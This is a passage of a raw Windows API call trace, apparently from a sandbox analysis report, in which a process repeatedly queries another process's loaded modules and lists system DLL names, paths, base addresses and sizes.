(in: hProcess=0x218, hModule=0x7feff2d0000, lpmodinfo=0x25d12f0, cb=0x18 | out: lpmodinfo=0x25d12f0*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0075.436] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.436] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff2d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0075.437] CoTaskMemFree (pv=0xd910e0) [0075.437] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.437] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff2d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0075.439] CoTaskMemFree (pv=0xd910e0) [0075.439] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb640000, lpmodinfo=0x25d34b0, cb=0x18 | out: lpmodinfo=0x25d34b0*(lpBaseOfDll=0x7fefb640000, SizeOfImage=0xac000, EntryPoint=0x7fefb6518d0)) returned 1 [0075.441] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.441] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb640000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="cscsvc.dll") returned 0xa [0075.443] CoTaskMemFree (pv=0xd910e0) [0075.443] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.443] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb640000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll")) returned 0x1e [0075.444] CoTaskMemFree (pv=0xd910e0) [0075.444] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb20000, lpmodinfo=0x25d5670, cb=0x18 | out: lpmodinfo=0x25d5670*(lpBaseOfDll=0x7fefcb20000, SizeOfImage=0x1e000, EntryPoint=0x7fefcb213b8)) returned 1 [0075.446] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.446] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb20000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USERENV.dll") returned 0xb [0075.448] CoTaskMemFree (pv=0xd910e0) [0075.448] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.448] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb20000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\USERENV.dll" (normalized: "c:\\windows\\system32\\userenv.dll")) returned 0x1f [0075.450] CoTaskMemFree (pv=0xd910e0) [0075.450] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd780000, lpmodinfo=0x25d7830, cb=0x18 | out: lpmodinfo=0x25d7830*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0075.452] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.452] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd780000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0075.453] CoTaskMemFree (pv=0xd910e0) [0075.454] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.454] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd780000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0075.455] CoTaskMemFree (pv=0xd910e0) [0075.455] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc80000, lpmodinfo=0x25d99f0, cb=0x18 | out: lpmodinfo=0x25d99f0*(lpBaseOfDll=0x7fefcc80000, SizeOfImage=0xd000, EntryPoint=0x7fefcc81348)) returned 1 [0075.457] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.457] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="pcwum.dll") returned 0x9 [0075.459] CoTaskMemFree (pv=0xd910e0) [0075.459] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.459] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")) returned 0x1d [0075.461] CoTaskMemFree (pv=0xd910e0) [0075.461] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb610000, lpmodinfo=0x25dbbb0, cb=0x18 | out: lpmodinfo=0x25dbbb0*(lpBaseOfDll=0x7fefb610000, SizeOfImage=0x30000, EntryPoint=0x7fefb62fe98)) returned 1 [0075.463] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.463] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="PeerDist.dll") returned 0xc [0075.465] CoTaskMemFree (pv=0xd910e0) [0075.465] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.465] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\PeerDist.dll" (normalized: "c:\\windows\\system32\\peerdist.dll")) returned 0x20 [0075.467] CoTaskMemFree (pv=0xd910e0) [0075.467] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd260000, lpmodinfo=0x25ddd80, cb=0x18 | out: lpmodinfo=0x25ddd80*(lpBaseOfDll=0x7fefd260000, SizeOfImage=0x2f000, EntryPoint=0x7fefd261064)) returned 1 [0075.469] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.469] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd260000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="AUTHZ.dll") returned 0x9 [0075.471] CoTaskMemFree (pv=0xd910e0) [0075.471] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.471] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd260000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\AUTHZ.dll" (normalized: "c:\\windows\\system32\\authz.dll")) returned 0x1d [0075.473] CoTaskMemFree (pv=0xd910e0) [0075.473] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb4e0000, lpmodinfo=0x25e0158, cb=0x18 | out: lpmodinfo=0x25e0158*(lpBaseOfDll=0x7fefb4e0000, SizeOfImage=0x127000, EntryPoint=0x7fefb4e10ec)) returned 1 [0075.479] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.479] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb4e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="taskschd.dll") returned 0xc [0075.481] CoTaskMemFree (pv=0xd910e0) [0075.481] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.481] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb4e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")) returned 0x20 [0075.483] CoTaskMemFree (pv=0xd910e0) [0075.483] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x25e2328, cb=0x18 | out: lpmodinfo=0x25e2328*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0075.485] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.485] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0075.487] CoTaskMemFree (pv=0xd910e0) [0075.487] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.487] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0075.489] CoTaskMemFree (pv=0xd910e0) [0075.489] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb3b0000, lpmodinfo=0x25e44e8, cb=0x18 | out: lpmodinfo=0x25e44e8*(lpBaseOfDll=0x7fefb3b0000, SizeOfImage=0x3d000, EntryPoint=0x7fefb3b1b7c)) returned 1 [0075.491] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.491] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb3b0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="mstask.dll") returned 0xa [0075.493] CoTaskMemFree (pv=0xd910e0) [0075.494] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.494] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb3b0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll")) returned 0x1e [0075.496] CoTaskMemFree (pv=0xd910e0) [0075.496] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc2b0000, lpmodinfo=0x25e66a8, cb=0x18 | out: lpmodinfo=0x25e66a8*(lpBaseOfDll=0x7fefc2b0000, SizeOfImage=0x1f4000, EntryPoint=0x7fefc43c924)) returned 1 [0075.498] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.498] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc2b0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="COMCTL32.dll") returned 0xc [0075.500] CoTaskMemFree (pv=0xd910e0) [0075.500] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.500] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc2b0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\COMCTL32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")) returned 0x7c [0075.502] CoTaskMemFree (pv=0xd910e0) [0075.502] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd070000, lpmodinfo=0x25e8930, cb=0x18 | out: lpmodinfo=0x25e8930*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0075.505] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.505] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd070000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0075.507] CoTaskMemFree (pv=0xd910e0) [0075.507] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.507] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd070000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0075.509] CoTaskMemFree (pv=0xd910e0) [0075.509] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd70000, lpmodinfo=0x25eaaf0, cb=0x18 | out: lpmodinfo=0x25eaaf0*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0075.512] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.512] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0075.514] CoTaskMemFree (pv=0xd910e0) [0075.514] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.514] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcd70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0075.516] CoTaskMemFree (pv=0xd910e0) [0075.516] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x25eccb0, cb=0x18 | out: lpmodinfo=0x25eccb0*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0075.519] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.519] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0075.521] CoTaskMemFree (pv=0xd910e0) [0075.521] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.521] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0075.525] CoTaskMemFree (pv=0xd910e0) [0075.525] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbb00000, lpmodinfo=0x25eee80, cb=0x18 | out: lpmodinfo=0x25eee80*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0075.528] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.528] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbb00000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0075.530] CoTaskMemFree (pv=0xd910e0) [0075.530] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.530] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbb00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0075.533] CoTaskMemFree (pv=0xd910e0) [0075.533] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd720000, lpmodinfo=0x25f1068, cb=0x18 | out: lpmodinfo=0x25f1068*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0075.535] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.535] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd720000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0075.538] CoTaskMemFree (pv=0xd910e0) [0075.538] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.538] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd720000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0075.540] CoTaskMemFree (pv=0xd910e0) [0075.540] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb00000, lpmodinfo=0x25f3228, cb=0x18 | out: lpmodinfo=0x25f3228*(lpBaseOfDll=0x7fefcb00000, SizeOfImage=0x1b000, EntryPoint=0x7fefcb02068)) returned 1 [0075.543] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.543] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb00000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="GPAPI.dll") returned 0x9 [0075.545] CoTaskMemFree (pv=0xd910e0) [0075.545] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.545] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\GPAPI.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")) returned 0x1d [0075.548] CoTaskMemFree (pv=0xd910e0) [0075.548] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb0d0000, lpmodinfo=0x25f53e8, cb=0x18 | out: lpmodinfo=0x25f53e8*(lpBaseOfDll=0x7fefb0d0000, SizeOfImage=0x10000, EntryPoint=0x7fefb0d27f0)) returned 1 [0075.550] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.550] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb0d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="uxsms.dll") returned 0x9 [0075.553] CoTaskMemFree (pv=0xd910e0) [0075.553] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.553] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb0d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\uxsms.dll" (normalized: "c:\\windows\\system32\\uxsms.dll")) returned 0x1d [0075.556] CoTaskMemFree (pv=0xd910e0) [0075.556] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbc60000, lpmodinfo=0x25f75a8, cb=0x18 | out: lpmodinfo=0x25f75a8*(lpBaseOfDll=0x7fefbc60000, SizeOfImage=0x35000, EntryPoint=0x7fefbc61064)) returned 1 [0075.558] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.558] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbc60000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="XmlLite.dll") returned 0xb [0075.561] CoTaskMemFree (pv=0xd910e0) [0075.561] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.561] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbc60000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\XmlLite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")) returned 0x1f [0075.564] CoTaskMemFree (pv=0xd910e0) [0075.564] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa150000, lpmodinfo=0x25f9768, cb=0x18 | out: lpmodinfo=0x25f9768*(lpBaseOfDll=0x7fefa150000, SizeOfImage=0x33000, EntryPoint=0x7fefa15101c)) returned 1 [0075.566] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.566] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa150000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="pcasvc.dll") returned 0xa [0075.572] CoTaskMemFree (pv=0xd910e0) [0075.572] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.572] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa150000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\pcasvc.dll" (normalized: "c:\\windows\\system32\\pcasvc.dll")) returned 0x1e [0075.575] CoTaskMemFree (pv=0xd910e0) [0075.575] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa0f0000, lpmodinfo=0x25fb928, cb=0x18 | out: lpmodinfo=0x25fb928*(lpBaseOfDll=0x7fefa0f0000, SizeOfImage=0x57000, EntryPoint=0x7fefa0f1118)) returned 1 [0075.577] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.577] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa0f0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0075.580] CoTaskMemFree (pv=0xd910e0) [0075.580] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.580] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa0f0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")) returned 0x1f [0075.583] CoTaskMemFree (pv=0xd910e0) [0075.583] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa0d0000, lpmodinfo=0x25fdae8, cb=0x18 | out: lpmodinfo=0x25fdae8*(lpBaseOfDll=0x7fefa0d0000, SizeOfImage=0x12000, EntryPoint=0x7fefa0d1050)) returned 1 [0075.586] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.586] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa0d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="AEPIC.dll") returned 0x9 [0075.589] CoTaskMemFree (pv=0xd910e0) [0075.589] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.589] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa0d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\AEPIC.dll" (normalized: "c:\\windows\\system32\\aepic.dll")) returned 0x1d [0075.592] CoTaskMemFree (pv=0xd910e0) [0075.592] GetModuleInformation (in: hProcess=0x218, hModule=0x73ff0000, lpmodinfo=0x25ffca8, cb=0x18 | out: lpmodinfo=0x25ffca8*(lpBaseOfDll=0x73ff0000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0075.594] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.594] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x73ff0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="sfc.dll") returned 0x7 [0075.597] CoTaskMemFree (pv=0xd910e0) [0075.597] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.597] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x73ff0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll")) returned 0x1b [0075.600] CoTaskMemFree (pv=0xd910e0) [0075.600] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa0c0000, lpmodinfo=0x2601e58, cb=0x18 | out: lpmodinfo=0x2601e58*(lpBaseOfDll=0x7fefa0c0000, SizeOfImage=0x10000, EntryPoint=0x7fefa0c1010)) returned 1 [0075.604] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.604] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa0c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="sfc_os.DLL") returned 0xa [0075.607] CoTaskMemFree (pv=0xd910e0) [0075.607] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.607] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa0c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\sfc_os.DLL" (normalized: "c:\\windows\\system32\\sfc_os.dll")) returned 0x1e [0075.610] CoTaskMemFree (pv=0xd910e0) [0075.610] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc940000, lpmodinfo=0x2604030, cb=0x18 | out: lpmodinfo=0x2604030*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0075.613] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.613] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc940000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0075.616] CoTaskMemFree (pv=0xd910e0) [0075.616] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.616] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc940000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0075.622] CoTaskMemFree (pv=0xd910e0) [0075.622] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd2a0000, lpmodinfo=0x24162f0, cb=0x18 | out: lpmodinfo=0x24162f0*(lpBaseOfDll=0x7fefd2a0000, SizeOfImage=0x6d000, EntryPoint=0x7fefd2a1010)) returned 1 [0075.625] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.625] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd2a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wevtapi.dll") returned 0xb [0075.628] CoTaskMemFree (pv=0xd910e0) [0075.628] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.628] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd2a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")) returned 0x1f [0075.631] CoTaskMemFree (pv=0xd910e0) [0075.631] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefe070000, lpmodinfo=0x24184b0, cb=0x18 | out: lpmodinfo=0x24184b0*(lpBaseOfDll=0x7fefe070000, SizeOfImage=0xd88000, EntryPoint=0x7fefe0ecebc)) returned 1 [0075.634] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.634] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefe070000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SHELL32.dll") returned 0xb [0075.637] CoTaskMemFree (pv=0xd910e0) [0075.638] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.638] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefe070000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0075.641] CoTaskMemFree (pv=0xd910e0) [0075.641] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb800000, lpmodinfo=0x241a670, cb=0x18 | out: lpmodinfo=0x241a670*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0075.644] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.644] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb800000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0075.647] CoTaskMemFree (pv=0xd910e0) [0075.647] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.647] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb800000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0075.650] CoTaskMemFree (pv=0xd910e0) [0075.650] GetModuleInformation (in: hProcess=0x218, hModule=0x7feffae0000, lpmodinfo=0x241c830, cb=0x18 | out: lpmodinfo=0x241c830*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0075.653] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.653] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feffae0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0075.656] CoTaskMemFree (pv=0xd910e0) [0075.656] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.656] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feffae0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0075.659] CoTaskMemFree (pv=0xd910e0) [0075.659] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9ee0000, lpmodinfo=0x241e9f0, cb=0x18 | out: lpmodinfo=0x241e9f0*(lpBaseOfDll=0x7fef9ee0000, SizeOfImage=0x22000, EntryPoint=0x7fef9ee1020)) returned 1 [0075.662] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.662] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9ee0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="trkwks.dll") returned 0xa [0075.666] CoTaskMemFree (pv=0xd910e0) [0075.666] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.666] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9ee0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\trkwks.dll" (normalized: "c:\\windows\\system32\\trkwks.dll")) returned 0x1e [0075.669] CoTaskMemFree (pv=0xd910e0) [0075.669] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa1b0000, lpmodinfo=0x2420bb0, cb=0x18 | out: lpmodinfo=0x2420bb0*(lpBaseOfDll=0x7fefa1b0000, SizeOfImage=0x19000, EntryPoint=0x7fefa1b2b50)) returned 1 [0075.672] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.672] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa1b0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wdi.dll") returned 0x7 [0075.675] CoTaskMemFree (pv=0xd910e0) [0075.675] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.675] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa1b0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll")) returned 0x1b [0075.679] CoTaskMemFree (pv=0xd910e0) [0075.679] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef92e0000, lpmodinfo=0x2422d60, cb=0x18 | out: 